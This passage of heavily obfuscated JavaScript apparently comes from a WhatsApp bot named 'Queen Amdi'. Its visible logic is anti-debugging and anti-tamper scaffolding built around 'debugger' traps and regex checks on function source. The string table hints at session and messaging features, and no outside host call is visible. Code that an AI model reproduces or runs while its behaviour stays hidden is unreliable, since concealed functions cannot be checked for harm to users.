function(_0x315273){}[_0xbc7231(-0xad,-0xcb,-0x137,-0x1a7,-0xd9)+_0xbc7231(-0x16c,-0x187,-0x165,-0xea,-0x1e1)+'r'](_0x13a864[_0x8a5919(0x35f,0x38f,0x301,0x381,0x32a)])[_0x253607(0x347,0x2c6,0x2b1,0x37f,0x313)](_0x13a864[_0x55fc30(0x5c3,0x5ff,0x5ca,0x592,0x593)]);else(function(){return![];}[_0x55fc30(0x4e0,0x4e2,0x48d,0x510,0x598)+_0x55fc30(0x4eb,0x49f,0x536,0x4e2,0x4e7)+'r'](_0x7b675b[_0x253607(0x1c1,0x293,0x27d,0x295,0x21a)](_0x7b675b[_0x8a5919(0x33f,0x358,0x3b9,0x322,0x336)],_0x7b675b[_0x559483(0x512,0x53f,0x4bb,0x507,0x4e9)]))[_0x253607(0x2bf,0x345,0x2e3,0x327,0x313)](_0x7b675b[_0x8a5919(0x360,0x335,0x391,0x318,0x375)]));}else{if(_0x13a864[_0x559483(0x5b3,0x57d,0x5e1,0x564,0x50b)](_0x13a864[_0x253607(0x202,0x263,0x2a1,0x27d,0x228)],_0x13a864[_0x8a5919(0x31b,0x2b0,0x2b4,0x33e,0x2d9)])){if(_0x13a864[_0x8a5919(0x34b,0x308,0x33d,0x2b6,0x33c)](_0x13a864[_0xbc7231(-0x124,-0x15c,-0x12d,-0xc5,-0x156)]('',_0x13a864[_0xbc7231(-0x91,-0x8,-0x71,0xc,-0x62)](_0x56d84b,_0x56d84b))[_0x13a864[_0xbc7231(-0x7d,-0x91,-0x8e,-0x66,-0x4f)]],0xbc9+-0x103a+0x472)||_0x13a864[_0x253607(0x231,0x1bb,0x290,0x19a,0x220)](_0x13a864[_0x55fc30(0x53c,0x57e,0x55a,0x5ae,0x5dd)](_0x56d84b,0x1*-0x91c+0x1*-0x173+-0x185*-0x7),0x8b9+-0x773+0x2*-0xa3)){if(_0x13a864[_0x55fc30(0x57e,0x592,0x5e8,0x5e5,0x59c)](_0x13a864[_0x8a5919(0x343,0x255,0x321,0x27b,0x2cc)],_0x13a864[_0x559483(0x5b7,0x618,0x5fe,0x5ee,0x5a0)]))return _0x1ce354;else(function(){function _0x3b0dc1(_0x168029,_0x162b83,_0x53b68a,_0x2903ec,_0x3b2845){return _0x559483(_0x168029-0x15e,_0x3b2845- -0x206,_0x2903ec,_0x2903ec-0x8f,_0x3b2845-0x11e);}function _0x16f134(_0x32eace,_0x2f424d,_0x1d69d3,_0x2ec1ee,_0x12f308){return _0x8a5919(_0x32eace-0xf2,_0x2f424d-0x118,_0x2ec1ee,_0x2ec1ee-0x10c,_0x2f424d-0x1e7);}function _0x503dfd(_0x1a7acb,_0x427cfa,_0x4753b8,_0x21d178,_0x330abe){return _0x559483(_0x1a7acb-0x1a,_0x427cfa- -0x282,_0x4753b8,_0x21d178-0x19,_0x330abe-0x89);}function _0x365f6c(_0x168674,_0x4e71d2,_0xf20478,_0x1c847b,_0x268a86){return _0x253607(_0x168674-0xaf,_0x4e71d2-0x1eb,_0xf20478-0x8e,_0x4e71d2,_0xf20478- -0x1d1);}if(_0x7b675b[_0x503dfd(0x269,0x2c8,0x28a,0x2c6,0x254)](_0x7b675b[_0x16f134(0x556,0x516,0x4d1,0x518,0x4c8)],_0x7b675b[_0x503dfd(0x2fd,0x2ee,0x303,0x282,0x263)]))_0x7b675b[_0x3b0dc1(0x324,0x348,0x2c7,0x317,0x34d)](_0x406929,0x1*0x5eb+0x1351+-0x193c);else return!![];}[_0x559483(0x5b4,0x536,0x4ff,0x57a,0x51d)+_0x55fc30(0x537,0x45c,0x568,0x4e2,0x528)+'r'](_0x13a864[_0x253607(0x24e,0x1ef,0x231,0x2bd,0x243)](_0x13a864[_0x55fc30(0x5c3,0x5a7,0x521,0x54c,0x5b6)],_0x13a864[_0x8a5919(0x333,0x288,0x25b,0x31b,0x2c9)]))[_0xbc7231(-0x81,-0x3f,-0x79,-0xd2,-0xb4)](_0x13a864[_0x559483(0x5ef,0x5f0,0x636,0x5fd,0x56c)]));}else _0x13a864[_0xbc7231(-0x14a,-0xbc,-0xf0,-0x73,-0xa8)](_0x13a864[_0x8a5919(0x384,0x44b,0x3b3,0x415,0x3c6)],_0x13a864[_0x253607(0x1f2,0x24f,0x252,0x2b4,0x233)])?function(){function _0x4c321c(_0x5ce2c7,_0x2b17ab,_0x32ded,_0x21b192,_0x29c687){return _0x559483(_0x5ce2c7-0xbd,_0x21b192- -0x1f5,_0x29c687,_0x21b192-0x33,_0x29c687-0xe6);}function _0x509273(_0x3ed8ad,_0x1cc21b,_0x3df505,_0x4df0a3,_0x40469f){return _0x253607(_0x3ed8ad-0x1e3,_0x1cc21b-0x1d2,_0x3df505-0x150,_0x3df505,_0x3ed8ad-0x18b);}function _0x1319b2(_0x3898d7,_0x414bc5,_0x49c898,_0x5214ad,_0x2de838){return _0x559483(_0x3898d7-0x5b,_0x49c898- -0x643,_0x414bc5,_0x5214ad-0x151,_0x2de838-0x10e);}function _0x722520(_0x468253,_0x135bec,_0x595bb8,_0x2bbe05,_0x2e6d72){return _0x55fc30(_0x468253-0x143,_0x135bec-0xa4,_0x135bec,_0x595bb8- -0x6c3,_0x2e6d72-0x199);}const _0x54c98e={'YEwRm':function(_0x3b5f0f,_0x3cfd84){function _0x4b4832(_0x329599,_0x3a0147,_0xf5de33,_0x25ad1f,_0x41848a){return _0x5ea5(_0x41848a- -0x182,_0x25ad1f);}return _0x13a864[_0x4b4832(-0x1f,0x30,0x65,0xab,0x23)](_0x3b5f0f,_0x3cfd84);}};if(_0x13a864[_0x1319b2(-0x13,0x9,-0x2c,0x3b,-0x7a)](_0x13a864[_0x1319b2(-0xab,-0x63,-0x5c,-0xdd,-0x92)],_0x13a864[_0x1319b2(-0xca,0x1f,-0x5c,0x0,-0x11)]))return![];else{if(_0x508afb)return _0x1eb162;else _0x54c98e[_0x509273(0x402,0x3ba,0x3f6,0x407,0x420)](_0x10988d,-0x47*-0x53+-0x66e*0x1+-0x1097);}}[_0x253607(0x1b9,0x210,0x1cf,0x288,0x23f)+_0x8a5919(0x2c5,0x24c,0x26b,0x2eb,0x2c7)+'r'](_0x13a864[_0xbc7231(-0x145,-0xc1,-0x111,-0x11f,-0x10b)](_0x13a864[_0x559483(0x571,0x572,0x5e1,0x53e,0x579)],_0x13a864[_0x559483(0x48c,0x50a,0x558,0x4bb,0x537)]))[_0x55fc30(0x5de,0x5ef,0x63f,0x5e4,0x586)](_0x13a864[_0x8a5919(0x373,0x370,0x412,0x32b,0x3b5)]):function(){return!![];}[_0x559483(0x4b9,0x536,0x51a,0x526,0x584)+_0x253607(0x18c,0x266,0x26c,0x21b,0x211)+'r'](_0x7b675b[_0x55fc30(0x569,0x467,0x563,0x4eb,0x488)](_0x7b675b[_0x253607(0x2d1,0x1f8,0x290,0x2e3,0x280)],_0x7b675b[_0x55fc30(0x566,0x55b,0x4b6,0x519,0x49f)]))[_0x55fc30(0x5aa,0x5f6,0x5c8,0x5ce,0x59e)](_0x7b675b[_0x253607(0x2e1,0x22f,0x2ac,0x24d,0x29c)]);}else return!![];}_0x13a864[_0x8a5919(0x430,0x3dd,0x33f,0x40c,0x3b4)](_0x45f82c,++_0x56d84b);}else return function(_0x1cc430){}[_0x253607(0x1d3,0x2b6,0x24f,0x216,0x23f)+_0x253607(0x206,0x261,0x1bc,0x259,0x211)+'r'](_0x13a864[_0xbc7231(-0x87,-0xfd,-0x102,-0xd2,-0x136)])[_0x55fc30(0x5fd,0x5f0,0x5ce,0x5e4,0x638)](_0x13a864[_0x8a5919(0x3a1,0x3a5,0x3c5,0x333,0x377)]);}try{if(_0x23618a){if(_0x13a864[_0x20f52d(0xfc,0x18f,0x17a,0x144,0x15e)](_0x13a864[_0x4fc19d(-0x1db,-0x185,-0x11a,-0x1b7,-0x206)],_0x13a864[_0x154117(0x7d,0xc3,0xe7,0xb5,0xa1)])){const _0x20bab4=new _0x23caa6(_0x13a864[_0x154117(0xff,0x115,0xc0,0x74,0x149)]),_0x13da69=new _0x3890b1(_0x13a864[_0x2e94e1(0xa7,0x57,0x13f,0xdd,0x110)],'i'),_0x200f79=_0x13a864[_0x4fc19d(-0x1d6,-0x18d,-0x16e,-0x189,-0x112)](_0x56f469,_0x13a864[_0x20f52d(0x249,0x1f9,0x1e9,0x21f,0x1e2)]);!_0x20bab4[_0x20f52d(0x22c,0x229,0x171,0x1b2,0x1a2)](_0x13a864[_0x2e94e1(0x79,0x36,0x10d,0xa5,0x12c)](_0x200f79,_0x13a864[_0x20f52d(0x151,0x14b,0x18b,0x15e,0x1ad)]))||!_0x13da69[_0x2e94e1(0xea,0xcc,0xf8,0xd9,0x53)](_0x13a864[_0x2e94e1(0x167,0x109,0x149,0x127,0x12e)](_0x200f79,_0x13a864[_0x20f52d(0x182,0x1f3,0x17e,0x1ac,0x181)]))?_0x13a864[_0x4fc19d(-0x16f,-0x18d,-0x199,-0x1f1,-0x1be)](_0x200f79,'0'):_0x13a864[_0x2e94e1(0x124,0x7c,0x69,0x9f,0x1b)](_0x491f64);}else return _0x45f82c;}else _0x13a864[_0x20f52d(0x23b,0x17b,0x1fc,0x1b3,0x1e3)](_0x45f82c,0xfe5+0x3*-0x151+-0xbf2);}catch(_0x144ac8){}}function _0x2fb5(){const _0x2b0ace=['tAyID','QuTwB','g.us','lpOtE','JlETp','3876355gLWvbK','AMDI;','Objec','data','*\x20⚠️','aHOhC','srwEi','.com/','XNNAz','n\x20Amd','://we','&plat','state','AIwan','ka\x20de','CWSUt','fwqKy','from','MyxQd','AKqre','hfSvV','ion','stop','sZaAx','user','toStr','de\x20Wi','RbOYZ','4042110BSBifn','rycNA','VWCAT','muokx','rJSHw','10HRHlMg','XqpWD','inclu','AUYOz','e)\x20{}','OlAtx','a-zA-','b.wha','-upda','nna\x20e','cting','ease\x20','vlZWd','nZEDV','AIErc','funct','HoRpF','6660027YzCjCV','call','sWHvj','pKevk','image','Z_$][','ZSQwe','data:','tawat','vQNuv','aAIIs','EnEpW','=2.21','jid','re\x20Th','acTty','\x20Quee','\x5c+\x5c+\x20','XMZDP','jYEdo','aAEOk','42229bdRhfe','8CixDhw','apply','oRQIJ','count','ing','aURL','QFBMp','hYtdC','des','*⚠️\x20Pl','bUyik','age','chain','NdbpB','XGZrc','XihXj','start','jeXQX','peWUf','cript','4Enco','ructo','pZoNW','bTGuJ','ziVKc','KgTsr','QUMXw','MRfyT','oSzBn','PeCyc','kfNJI','zA-Z_','bAaka','0-9a-','KLVrP','timeo','oyDfm','setup','Do\x20No','ubfPa','utMs','te?ve','kBOxt','clien','OzJKK','\x5c(\x20*\x5c','40.12','qAzxj','ILnmQ','lengt','fYXju','https','yone\x20','yfXtg','UPUID','SwxuF','4211034fhfHhQ','dedAu','4419Vxxask','rsion','ocRgt','curre','essag','WydpL','ion\x20*','tsapp','versi','const','DoQyE','dfvTe','text','DktaP','FLxAG','form=','gnMYJ','th\x20An','bHodL','DnMrD','get','delet','HysBt','fMiKh','logge','toDat','ObJtr','JpEXK','qmYFN','Ywkyc','is\x20Co','TGYOE','MjNlT','wAAIK','HELP_','UzsPN','input','pa\x20ka','EKpAg','while','emGbO','hEwjc','/png;','level','bAwWS','WYqQs','open','zUAPB','IJQoY','web','fZuCH','INBOX','DagfD','thInf','3.5','CmPAZ','eZPPo','brows','sniJf','debu','PdolI','EDGE','Ycdzr','sHHXd','HlFNp','YEwRm','ZctfI','wjpgT','yIOTd','UStna','eMess','erDes','DwQGI','repla','ceLnx','YBnnv','check','nENgz','name','SMgSh','TGkTM','sion','actio','XOVlz','yNZWp','conne','sWith','ySawM','t\x20Sha','rRWtG','IKXwK','cctKE','RgkVw','base6','ntVer','*(?:[','/dyno','ljJKm','gigbx','test','catch','bGbEV','LkYSI','AIvHn','544YjxPUS','messa','amdi_','scale','\x20(tru','sIpat','MhyAa','log','FQhrH','NSbXt','*⚠️\x20Me','jNtiX','ggiSc','warn','hvQZj','deRVm','key','lWXmi','jhMNX','init','iGFdk','gger','AtzLm','BIRcH','vPThs','MqIGs','LFSvR','strin','sendM','gify','iBkTh','$]*)','2744065QFQDWp','frMtd','olJlV','QhNnN','split','DzAtL','OntIU'];_0x2fb5=function(){return _0x2b0ace;};return _0x2fb5();}
}));
